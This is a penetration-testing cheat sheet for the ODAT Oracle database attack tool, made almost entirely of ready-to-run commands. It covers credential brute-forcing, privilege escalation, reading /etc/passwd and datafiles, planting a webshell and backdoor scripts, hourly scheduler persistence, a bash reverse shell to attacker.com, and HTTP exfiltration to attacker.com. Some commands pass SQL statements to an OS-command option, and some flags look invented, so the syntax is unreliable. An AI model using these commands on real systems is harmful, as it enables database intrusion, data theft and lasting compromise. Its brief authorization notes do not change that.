ODAT

Overview

ODAT (Oracle Database Attacking Tool) is a Python-based penetration testing toolkit specifically designed for Oracle Database security testing. It identifies misconfigurations, weak credentials, and exploitable vulnerabilities in Oracle Database instances. ODAT can perform reconnaissance, credential testing, privilege escalation, and code execution on vulnerable Oracle systems.

The tool combines multiple attack vectors including SQL injection, default credential testing, privilege escalation, and direct database access exploitation. It’s essential for database security professionals conducting authorized assessments of Oracle infrastructure.

Installation

Requirements

# Python 3.x
python3 --version

# pip for package management
pip3 --version

# Oracle client libraries (optional but recommended)
# Install libaio1 on Linux
sudo apt-get install libaio1 libaio-dev

Installation via Git

# Clone the repository
git clone https://github.com/quentinhardy/odat.git
cd odat

# Install dependencies
pip3 install -r requirements.txt

# Make executable
chmod +x odat.py

# Test installation
python3 odat.py --help

Installation from PyPI

# Install via pip
pip3 install odat

# Verify
odat --help

Docker Installation

# Build Docker image
docker build -t odat .

# Run in Docker
docker run -it odat --help

Basic Syntax

python3 odat.py [module] [options]
odat [module] [options]

Core Modules

Module	Description	Purpose
`all`	Run all modules	Complete assessment
`tnslsnr`	TNS Listener reconnaissance	Enumerate services
`listener`	Listener enumeration	Service discovery
`tnspoison`	TNS poisoning	MITM attack vector
`credentialstest`	Test default credentials	Quick credential check
`utlfile`	UTL_FILE privilege check	File read/write testing
`utlhttp`	UTL_HTTP testing	HTTP request capability
`httpserver`	HTTP server module	Web interface access
`externaltable`	External table creation	Data access method
`dbmsxmlquery`	DBMS_XMLQUERY testing	XML query execution
`dbmsscheduler`	DBMS_SCHEDULER testing	Scheduled job creation
`java`	Java execution testing	Code execution path
`oraexec`	Operating system command execution	Shell command access
`ctxsys`	CTXSYS module testing	Context privileges
`mdsys`	MDSYS module testing	Spatial features
`silverknight`	SilverKnight password audit	Password strength check
`passwords`	Password dictionary testing	Credential brute-force

Essential Commands

Command	Description
`-h, --help`	Display help message
`-v`	Verbose output
`-vv`	Very verbose output
`--version`	Show version
`-t, --target`	Target host or IP address
`-p, --port`	Target database port (default: 1521)
`-d, --database`	Database name (SID)
`-U, --user`	Username for authentication
`-P, --password`	Password for authentication
`--accounts-file`	File with account credentials
`--passwords-file`	Wordlist for password testing
`-m, --module`	Specific module to run
`--all`	Run all applicable modules
`-x`	Exploit/attack mode
`--output`	Output file for results

TNS Listener Enumeration

Listener Discovery

# Enumerate TNS listeners
python3 odat.py tnslsnr -t 192.168.1.100 -vv

# Output includes:
# - Version information
# - Service names
# - Instance details
# - Listener status

Service Enumeration

# Get detailed service information
python3 odat.py listener -t 192.168.1.100 -p 1521

# Lists:
# - Available database instances
# - Service names (SIDs)
# - Network aliases

Check Listener Version

# Specific listener information
python3 odat.py tnslsnr -t 192.168.1.100 -p 1521 -vv

# Useful for identifying vulnerable versions

Credential Testing

Default Credentials

# Test common Oracle default credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL -U sys -P change_on_install

# Common accounts:
# - sys / change_on_install
# - system / manager
# - scott / tiger
# - dbsnmp / dbsnmp
# - sysman / sysman

Credential Testing from Wordlist

# Test credentials from file
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL \
  --accounts-file accounts.txt

# accounts.txt format:
# username:password
# sys:change_on_install
# system:manager

Brute-Force Testing

# Test password list against known users
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL \
  -U system --passwords-file passwords.txt

# Test multiple users with wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  --users-file users.txt --passwords-file passwords.txt

Privilege Escalation

Direct Privilege Escalation

# Escalate from limited user to admin
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --sysdba

# Gain SYSDBA privileges
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password -x

Vulnerable Packages Exploitation

# Exploit vulnerable Oracle packages
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -x

# CTXSYS privilege escalation
python3 odat.py ctxsys -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -x

# MDSYS exploitation
python3 odat.py mdsys -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -x

File System Access

Read Files via UTL_FILE

# Read local files
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /etc/passwd

# Read Oracle files
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /u01/app/oracle/alert/alert_ORCL.log

Write Files via UTL_FILE

# Write files to server
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --write /tmp/backdoor.sh

# Create webshell
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --write /var/www/html/shell.jsp

Create External Tables

# Create external table for file access
python3 odat.py externaltable -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --read /etc/passwd

# Extract data from server
python3 odat.py externaltable -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /u01/app/oracle/oradata/ORCL/system01.dbf

Code Execution

Execute Operating System Commands

# Direct OS command execution
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "whoami"

# Execute commands via Java
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --exec "id"

# Create reverse shell
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "bash -i >& /dev/tcp/attacker.com/4444 0>&1"

Scheduled Job Execution

# Use DBMS_SCHEDULER for persistence
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --create-job "myjob" --exec "whoami"

# Execute at specific time
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --create-job "myjob" --schedule "FREQ=DAILY;BYHOUR=2"

HTTP Communication

HTTP Server Access

# Check HTTP server capabilities
python3 odat.py httpserver -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --geturl "http://attacker.com/file"

# Upload files via HTTP
python3 odat.py httpserver -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --putfile "shell.jsp" "attacker.com"

UTL_HTTP Exploitation

# Make HTTP requests from database
python3 odat.py utlhttp -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --request "GET http://attacker.com/data"

# Data exfiltration via HTTP
python3 odat.py utlhttp -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --request "POST http://attacker.com/exfil"

Network Attacks

TNS Listener Poisoning

# Poison TNS responses for MITM attack
python3 odat.py tnspoison -t 192.168.1.100 -vv

# Intercept and modify connections
# Require network access on same segment

Comprehensive Assessment

Full Database Audit

# Run all assessment modules
python3 odat.py all -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv

# Includes:
# - Service enumeration
# - Credential testing
# - Privilege escalation checks
# - File access verification
# - Code execution paths

Multi-Database Assessment

# Test against multiple databases
for db in DB1 DB2 DB3; do
  python3 odat.py all -t 192.168.1.100 -p 1521 -d $db \
    -U scott -P tiger -vv --output "$db-audit.txt"
done

Vulnerability Assessment

# Check for known vulnerabilities
python3 odat.py all -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password -vv 2>&1 | grep -i "vulnerable\|exploit\|vulnerability"

Advanced Exploitation

Chaining Multiple Exploits

#!/bin/bash
# 1. Identify valid credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
  -d ORCL --accounts-file accounts.txt > valid_creds.txt

# 2. Test for privilege escalation
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv > priv_esc.txt

# 3. Execute commands if possible
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "cat /etc/hostname"

Persistence Mechanisms

# Create scheduled job for persistence
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --create-job "backdoor" \
  --exec "bash /tmp/persistence.sh" \
  --schedule "FREQ=HOURLY"

# Create stored procedure backdoor
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "CREATE OR REPLACE PROCEDURE backdoor AS BEGIN EXECUTE IMMEDIATE 'whoami'; END;"

Data Exfiltration

# Extract sensitive data
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /u01/app/oracle/oradata/

# Query database and exfiltrate
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --exec \
  "SELECT * FROM sys.user\$ WHERE TYPE#=1" > users.txt

Password Auditing

SilverKnight Password Check

# Audit password strength
python3 odat.py silverknight -t 192.168.1.100 -p 1521 -d ORCL \
  -U sys -P change_on_install

# Identifies:
# - Weak passwords
# - Default credentials
# - Dictionary words
# - Common patterns

Password Dictionary Attack

# Brute-force with wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  --users-file users.txt --passwords-file /usr/share/wordlists/rockyou.txt

# Custom wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  --users-file users.txt --passwords-file custom-passwords.txt

Real-World Assessment Workflow

Phase 1: Reconnaissance

# Identify Oracle services
python3 odat.py tnslsnr -t 192.168.1.100 -vv

# Enumerate instances
python3 odat.py listener -t 192.168.1.100 -p 1521 -vv

Phase 2: Credential Testing

# Test default credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
  -d ORCL --accounts-file default-accounts.txt

# Brute-force weak passwords
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  -U system --passwords-file passwords.txt

Phase 3: Privilege Escalation

# Check for privilege escalation vectors
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv

python3 odat.py ctxsys -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv

Phase 4: Exploitation

# Attempt code execution
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "whoami"

# Extract sensitive data
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /etc/passwd

Troubleshooting

Connection Issues

# Test connectivity
python3 odat.py tnslsnr -t 192.168.1.100 -p 1521 -vv

# Check firewall
telnet 192.168.1.100 1521

# Verify database name (SID)
tnsping ORCL

Authentication Failures

# Verify credentials
sqlplus scott/tiger@192.168.1.100:1521/ORCL

# Check user privileges
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
  -d ORCL -U scott -P tiger -vv

Module Execution Errors

# Enable verbose output
python3 odat.py <module> -t <target> -vv

# Check Python version
python3 --version

# Verify dependencies
pip3 list | grep cx_Oracle

Security Considerations

Obtain written authorization before testing
Use ODAT in controlled lab environments only
Minimize impact on production systems
Document all activities and findings
Use appropriate network isolation
Maintain confidentiality of assessment results
Follow organizational security policies
Implement proper logging and monitoring

sqlplus - Oracle command-line client
SQLMap - SQL injection testing tool
Metasploit - General penetration testing framework
Burp Suite - Web application testing (for web-based access)
tnsping - Oracle TNS connectivity tool
nmap - Network discovery and scanning

References

ODAT GitHub: https://github.com/quentinhardy/odat
Oracle Database documentation
OWASP Database Security
CVE Oracle Database vulnerabilities
Authorized penetration testing methodologies
Responsible disclosure guidelines